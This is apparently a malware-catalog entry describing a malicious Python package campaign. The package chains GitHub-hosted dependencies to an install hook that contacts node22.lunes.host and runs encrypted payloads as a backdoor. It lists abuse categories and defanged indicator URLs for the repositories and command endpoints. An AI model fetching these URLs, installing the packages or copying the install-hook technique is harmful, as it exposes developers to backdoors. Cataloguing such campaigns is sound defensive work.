MALICIOUS (1) campaign cataloged at 2026-06-20(2).
- The campaign has clearly malicious intent, like infostealers.
- This is just the date of creating the catalog entry. It may not reflect the date of creation of the campaign itself.
2026-06-requests-enhancer¶
Malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHub repository "Hexa-devy/netflow-utils", which then attempts to download "codexio-boop/platform_syslib". The last one contains obfuscated code that during installation connects with node22.lunes[.]host:3258 and downloads encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-living generated tokens are used.
Abuse categories¶
backdoor
Campaign uses backdoor.
obfuscation
Code uses obfuscation techniques to hide its true purpose.
override_install
The package overrides the install command in setup.py to execute malicious code during installation.
remote_commands
The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
through_dependency
The malicious code is intentionally included in a dependency of the package
References¶
Referenced resources may include blog posts about the campaign, malware analysis, sandbox reports, or other relevant information.
IoCs & related URLs¶
URLs with payloads, characteristic domains, C&C IPs, repositories with malicious code, etc.
-
hxxps://github.com/codexio-boop/platform_syslib/archive/refs/heads/master.zip -
hxxps://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip -
hxxp://node22.lunes.host:3258/sync?v= -
hxxp://node22.lunes.host:3258/go?n= -
hxxp://node22.lunes.host:22240/update?v=